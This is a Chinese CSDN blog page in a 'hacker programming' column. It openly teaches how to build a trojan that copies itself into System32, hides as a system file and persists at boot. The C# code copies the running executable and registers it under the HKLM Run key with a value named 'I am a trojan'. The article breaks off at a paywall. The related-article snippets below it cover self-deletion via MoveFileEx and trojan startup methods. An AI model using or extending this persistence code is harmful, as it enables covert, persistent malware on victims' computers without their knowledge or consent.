实现程序复制到系统盘,自启动,自删除,隐藏为系统文件

最新推荐文章于 2024-07-24 15:12:14 发布
最新推荐文章于 2024-07-24 15:12:14 发布
阅读量734 收藏 2
点赞数
分类专栏: .NET平台C#编程—黑客编程 文章标签: string windows class c# 工作 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y182028136/article/details/6096954
版权

文:RQC

 

我们在开发木马程序的时候一般都希望别人一运行就把自己复制到C:/Windows/System32 目录下并且将其文件属性改为系统文件而且为隐藏好让别人不太好发觉,然后开机还要实现自启动,在C#中我们该怎么做呢,代码如下:

 

using System.IO;

using Microsoft.Win32;
using System.Diagnostics;       //引入这几个命名空间

 

string filename = Application.ExecutablePath;   //得到自身的路径和文件名

string New_filename = @"C:/Windows/System32/" + Process.GetCurrentProcess().ProcessName + ".exe";  //目标文件路径和文件名

 

//判断 C:/Windows/System32 这个目录下是否存在本程序 防止多次复制

 if (!File.Exists(New_filename))

{

      File.Copy(filename,New_filename); //将其复制进去

      //将程序路径写入注册表,随Windows启动
      RegistryKey runkey = Registry.LocalMachine;
      RegistryKey run = runkey.CreateSubKey(@"SOFTWARE/Microsoft/Windows/CurrentVersion/Run");

      run.SetValue("爷是木马", New_filename);

      //将复制

最低0.47元/天 解锁文章
y182028136
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
bat批处理文件实现复制删除、创建文件夹、执行程序、打开文件
12-15
要包含上一示例的任何系统或隐藏文件,请按如下所示添加 /h 命令行选项: xcopy a:b:/s /e /h 要使用 \Rawdata 目录 1993 年 12 月 29 日后更改的文件更新 \Reports 目录的文件,请键入: xcopy \rawdata ...
程序复制到系统目录,设置开机自启动
weixin_30773135的博客
01-01 141
程序比较简单,用到了C语言获得自身路径和系统路径,修改注册表项等,某些函数不理解可以查看MSDN 1 #include<stdio.h> 2 #include<windows.h> 3 4 char *GetFilename(char *p) //得到一个路径的纯文件名 5 { 6 int x=strlen(p); 7 c...
自我复制到系统目录,并写注册表,使程序开机自动运行
xiaomaoxia的专栏
04-06 914
procedure TForm1.CopyNWriteRegestry;var Path:array [0..255] of char;    Hk:HKEY;    SysStr,CurStr:string;begin//以下是自我复制,首先判断该程序是否存在,再决定是否进行复制    GetSystemDirectory(Path,255);    SysStr:=StrPas(Path); 
程序自我复制然后删除自己
mmllkkjj的专栏
06-23 4471
http://blog.csdn.net/sanve/archive/2005/04/14/347560.aspx大家都知道,一般的程序运行的时候,可执行文件本身是被操作系统保护的,不能用改写的方式访问,更别提在本身还在运行的时侯删除自己了。在Lu0的主页上看到一种UNDOCUMENT的方法,通过改变系统底层的文件访问模式实现删除自己,那是实在功夫。我看了很是佩服。但是有没有一种用在M
利用MoveFileEx实现程序隐藏自启动与自删除
weixin_34203426的博客
01-24 194
一、了解MoveFileEx MoveFileEx是MoveFile函数的扩展函数,也是用来移动文件,不过多加了一些功能。MoveFileEx函数的原型如下: BOOL MoveFileEx ( LPCTSTR lpExistingFileName, LPCTSTR lpNewFileName,   DWORD dwFlags ); 第一个参数是要移动的文件名,第二个是移动后的文件名,最后一...
搜索隐藏文件 海鸥搜索隐藏文件 v2.0
10-17
1. **搜索隐藏文件**:海鸥搜索隐藏文件的主要功能是查找系统被设置为隐藏属性的文件和文件夹。它能迅速遍历指定路径,找出那些通过常规方式不易发现的隐藏元素,为用户揭示系统潜在的信息。 2. **深度扫描**:...
多系统启动引导程序xorldr_0.52
05-31
XORLDR 是一个轻量级的多系统引导程序,它使用图形化的选择菜单,可以管理多达 16 个系统的启动。XORLDR 的启动对象可以是分区的引导扇区,也可以是分区上的某个文件,还可以是指定的绝对扇区号。 XORLDR 支持的...
WIN7系统盘瘦身方法(GHOST最小系统).pdf
11-28
3. 显示隐藏文件和文件夹,将禁用账户的个人文件和文件夹复制到默认用户文件夹内。 4. 删除禁用的用户账户,同时删除其用户配置文件。 三、关闭系统休眠 1. 使用命令提示符执行 `powercfg -a` 查看系统是否支持休眠...
nt6 hdd installer 硬盘安装系统必备!
05-27
一、有使用过其它硬盘安装方法(复制BOOT文件夹至C盘)不成功的请先删除复制的C盘的BOOT文件夹后再行安装,否则安装成多系统有可能造成无法完成安装而失败,格C盘装成单系统的话删不删都不影响。 二、进安装后无法...
bat删除、启动、关闭、等待、复制 程序
北唐盛世
02-25 2133
@echo off start "" "C:\Program Files\Diacom corporate\Diacom-NLS\Diacom-START_old.exe"  start /min /w mshta vbscript:setTimeout("window.close()",1000) taskkill /f /IM Diacom-START_old.exe
程序文件拷贝自启动服务添加
fan380485838的专栏
05-14 333
一般是在device.mk文件执行如下的拷贝工作 PRODUCT_COPY_FILES+=\ device/hisilicon/bigfish/etc/usbfs.sh:system/etc/usbfs.sh 二:添加启动动作,使Android在启动时候执行 init.rc文件末尾处加入以下内容(不再详述,不懂的自己翻书或者爬网查) servicemou...
c++程序复制文件C:\Windows\system32\文件夹问题,windows上的坑
SG匚hang的博客
04-10 3394
因为程序是32位的,在64位系统下,所有对system32的操作都会被重定向为syswow64 关闭重定向 if (Wow64EnableWow64FsRedirection(FALSE))//关闭重定向 { MoveFileEx("C:\\Windows\\SysWow64\\drivers\\aaa.sys", "C:\\Windows\\System32\\drivers\...
认识木马启动的六种方式
zhoubaocun的专栏
03-21 832
认识木马启动的六种方式 木马是随计算机或Windows的启动而启动并掌握一定的控制权的,其启动方式可谓多种多样,通过注册表启动、通过System.ini启动、通过某些特定程序启动等,真是防不胜防。其实只要能够遏制住不让它启动,木马就没什么用了,这里就简单说说木马的启动方式,知己知彼百战不殆嘛。   一、通过"开始/程序/启动"   隐蔽性:2星   应用程度:较低   这也是一种很常见的方式,
C++:程序的自我复制及开机启动
weixin_34061042的博客
04-06 386
#include &lt;windows.h&gt;int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil){ char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODU...
利用API函数MoveFileEx实现程序隐藏自启动与自删除
云守护的专栏
03-20 1346
#include "stdafx.h" #include #include #include #include //http://www.cnblogs.com/yincheng01/archive/2010/12/17/2213190.html void usage(char *); int StartShell(LPVOID lParam) { ShellExecute(NULL,
C++STL初阶(8):list的简易实现(上)
最新发布
2301_79501467的博客
07-24 727
简易实现List的前半部分内容(不包括各类构造)
2024.7.22 作业
qq_64434282的博客
07-22 769
输出:该数的对应的进制数。输入:一个整数,进制数。
老毛桃U盘启动盘制作与系统安装教程
值得注意的是,老毛桃启动盘的启动文件是隐藏的,以防止被误删除或病毒感染。同时,制作启动盘后,U盘的可用容量会减少约330MB,这是正常现象。如果不再需要启动盘功能,可以通过程序提供的选项恢复U盘到原始状态...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值